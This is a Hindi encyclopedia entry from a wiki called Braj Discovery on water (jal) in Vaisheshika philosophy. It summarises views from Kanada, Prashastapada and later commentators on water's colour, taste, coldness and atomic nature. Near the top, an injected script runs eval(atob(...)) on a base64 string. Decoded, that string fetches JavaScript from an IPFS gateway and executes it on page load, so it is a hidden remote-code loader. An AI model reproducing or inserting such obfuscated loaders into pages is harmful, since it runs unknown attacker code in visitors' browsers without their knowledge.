जल

ब्रज डिस्कवरी, एक मुक्त ज्ञानकोष से
(अप से पुनर्निर्देशित)
नेविगेशन पर जाएँ खोज पर जाएँ

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

जल / अप / Jal

  • सूत्रकार कणाद के अनुसार रूप, रस, स्पर्श नामक गुणों का आश्रय तथा स्निग्ध द्रव्य ही जल है।<balloon title="रूपरसस्पर्शवत्य आपो द्रवा: हिनग्धा:, वै.सू. 2.1.2" style=color:blue>*</balloon>
  • प्रशस्तपाद ने पृथ्वी के समान जल में भी समवाय सम्बन्ध से चौदह गुणों के पाये जाने का उल्लेख किया है।
  • जल का रंग अपाकज और अभास्वर शुक्ल होता है।
  • यमुना के जल में जो नीलापन है, वह यमुना के स्त्रोत में पाये जाने वाले पार्थिव कणों के संयोग के कारण औपाधिक है। जल में स्नेह के साथ-साथ सांसिद्धिक द्रवत्व हैं।<balloon title="द्रवत्वं सांसिद्धकिरूपेण जलस्याधारणम्, सेतु पृ. 241" style=color:blue>*</balloon>
  • जल का शैत्य ही वास्तविक है। उसमें केवल मधुर रस ही पाया जाता है।<balloon title="किरणावली, पृ. 67-68" style=color:blue>*</balloon>
  • उसके अवान्तर स्वाद खारापन, खट्टापन आदि पार्थिव परमाणुओं के कारण होते हैं।
  • आधुनिक विज्ञान के अनुसार जल सर्वथा स्वादरहित होता है, अत: जल के माधुर्य के सम्बन्ध में वैशेषिकों का मत चिन्त्य है।<balloon title="धर्मेन्द्रनाथ शास्त्री, न्या.सि.मु. व्याख्या, पृ. 200" style=color:blue>*</balloon>
  • पृथ्वी की तरह जल भी परमाणु रूप में नित्य और कार्यरूप में अनित्य होता है।
  • कार्यरूप जल में शरीर, इन्द्रिय (रसना) और विषय-भेद से तीन प्रकार का द्रव्यारम्भकत्व समवायिकारणत्व माना जाता है। अर्थात जल शरीरारम्भक, इन्द्रियारम्भक और विषयारम्भक होता है।
  • सरिता, हिम, करका आदि विषय रूप जल है। जल का ज्ञान प्रत्यक्ष प्रमाण से होता है।